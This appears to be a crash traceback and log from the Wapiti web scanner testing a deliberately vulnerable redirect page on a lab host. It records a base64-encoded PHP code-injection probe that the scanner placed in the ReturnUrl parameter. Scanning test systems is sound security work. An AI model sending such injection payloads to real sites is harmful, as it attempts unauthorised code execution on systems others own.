  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 641, in run_until_complete
    self.run_forever()
    │    └ <function BaseEventLoop.run_forever at 0x76d41ad44b80>
    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 608, in run_forever
    self._run_once()
    │    └ <function BaseEventLoop._run_once at 0x76d41ad46980>
    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 1936, in _run_once
    handle._run()
    │      └ <function Handle._run at 0x76d41aea4e00>
    └ <Handle <TaskStepMethWrapper object at 0x76d415261480>()>
  File "/usr/local/lib/python3.11/asyncio/events.py", line 84, in _run
    self._context.run(self._callback, *self._args)
    │    │            │    │           │    └ <member '_args' of 'Handle' objects>
    │    │            │    │           └ <Handle <TaskStepMethWrapper object at 0x76d415261480>()>
    │    │            │    └ <member '_callback' of 'Handle' objects>
    │    │            └ <Handle <TaskStepMethWrapper object at 0x76d415261480>()>
    │    └ <member '_context' of 'Handle' objects>
    └ <Handle <TaskStepMethWrapper object at 0x76d415261480>()>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti.py", line 382, in wapiti_main
    await wap.attack(global_stop_event)
          │   │      └ <asyncio.locks.Event object at 0x76d41b52f250 [unset]>
          │   └ <function Wapiti.attack at 0x76d41620e520>
          └ <wapitiCore.controller.wapiti.Wapiti object at 0x76d416493210>
> File "/usr/local/lib/python3.11/site-packages/wapitiCore/controller/wapiti.py", line 503, in attack
    await attack_module.attack(original_request, original_response)
          │             │      │                 └ <wapitiCore.net.response.Response object at 0x76d415493150>
          │             │      └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
          │             └ <function ModuleExec.attack at 0x76d415447100>
          └ <wapitiCore.attack.mod_exec.ModuleExec object at 0x76d41544aa90>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/attack/mod_exec.py", line 101, in attack
    response: Response = await self.crawler.async_send(mutated_request)
    │                          │    │       │          └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D (0)
    │                          │    │       └ <function AsyncCrawler.async_send at 0x76d419ba6020>
    │                          │    └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
    │                          └ <wapitiCore.attack.mod_exec.ModuleExec object at 0x76d41544aa90>
    └ <wapitiCore.net.response.Response object at 0x76d41524c050>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 386, in async_send
    response = await self.async_get(request, headers=headers,
                     │    │         │                └ None
                     │    │         └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D (0)
                     │    └ <function AsyncCrawler.async_get at 0x76d419ba6160>
                     └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 59, in inner_wrapper
    value = await function(*args, **kwargs)
                  │         │       └ {'headers': None, 'follow_redirects': False, 'stream': False, 'timeout': None}
                  │         └ (<wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>, GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A...
                  └ <function AsyncCrawler.async_get at 0x76d419ba60c0>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 238, in async_get
    response = await self._client.send(
                     │    │       └ <function AsyncClient.send at 0x76d41a10d1c0>
                     │    └ <httpx.AsyncClient object at 0x76d41725c410>
                     └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1617, in send
    response = await self._send_handling_auth(
                     │    └ <function AsyncClient._send_handling_auth at 0x76d41a10d260>
                     └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1645, in _send_handling_auth
    response = await self._send_handling_redirects(
                     │    └ <function AsyncClient._send_handling_redirects at 0x76d41a10d300>
                     └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1703, in _send_handling_redirects
    raise exc
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1692, in _send_handling_redirects
    request = self._build_redirect_request(request, response)
              │    │                       │        └ <Response [302 Found]>
              │    │                       └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%...
              │    └ <function BaseClient._build_redirect_request at 0x76d41a0ffc40>
              └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 465, in _build_redirect_request
    url = self._redirect_url(request, response)
          │    │             │        └ <Response [302 Found]>
          │    │             └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%...
          │    └ <function BaseClient._redirect_url at 0x76d41a0ffd80>
          └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 517, in _redirect_url
    url = url.copy_with(host=request.url.host)
          │   │              │       │   └ <property object at 0x76d41a80df80>
          │   │              │       └ URL('http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D')
          │   │              └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%...
          │   └ <function URL.copy_with at 0x76d41a81d8a0>
          └ URL('data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==')
  File "/usr/local/lib/python3.11/site-packages/httpx/_urls.py", line 348, in copy_with
    return URL(self, **kwargs)
           │   │       └ {'host': 'web'}
           │   └ URL('data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==')
           └ <class 'httpx.URL'>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urls.py", line 115, in __init__
    self._uri_reference = url._uri_reference.copy_with(**kwargs)
    │                     │   │              │           └ {'host': 'web'}
    │                     │   │              └ <function ParseResult.copy_with at 0x76d41a81c400>
    │                     │   └ ParseResult(scheme='data', userinfo='', host='', port=None, path=';base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==', quer...
    │                     └ URL('data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==')
    └ <unprintable URL object>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 134, in copy_with
    return urlparse("", **defaults)
           │              └ {'scheme': 'data', 'authority': '', 'path': ';base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==', 'query': None, 'fragment'...
           └ <function urlparse at 0x76d41a81c220>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 252, in urlparse
    validate_path(path, has_scheme=has_scheme, has_authority=has_authority)
    │             │                │                         └ True
    │             │                └ True
    │             └ ';base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg=='
    └ <function validate_path at 0x76d41a81ca40>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 369, in validate_path
    raise InvalidURL("For absolute URLs, path must be empty or begin with '/'")
          └ <class 'httpx.InvalidURL'>

httpx.InvalidURL: For absolute URLs, path must be empty or begin with '/'
2024-03-20 16:56:32.816 | INFO     | wapitiCore.controller.wapiti:send_bug_report:616 - Wapiti 3.1.8. httpx 0.24.1. OS linux
2024-03-20 16:56:32.902 | SUCCESS  | wapitiCore.controller.wapiti:send_bug_report:627 - Sending crash report cdfbc50a-e6da-11ee-bf5a-0242ac160004 ... SUCCESS
2024-03-20 16:56:32.906 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module permanentxss
2024-03-20 16:56:33.040 | GREEN    | wapitiCore.controller.wapiti:write_report:601 - [*] Generating report...
2024-03-20 16:56:33.079 | SUCCESS  | wapitiCore.controller.wapiti:write_report:603 - A report has been generated in the file ./data/output//redirect2.json/
2024-03-20 16:56:33.079 | SUCCESS  | wapitiCore.controller.wapiti:write_report:605 - Open ./data/output//redirect2.json/web_03202024_1656.html with a browser to see this report.
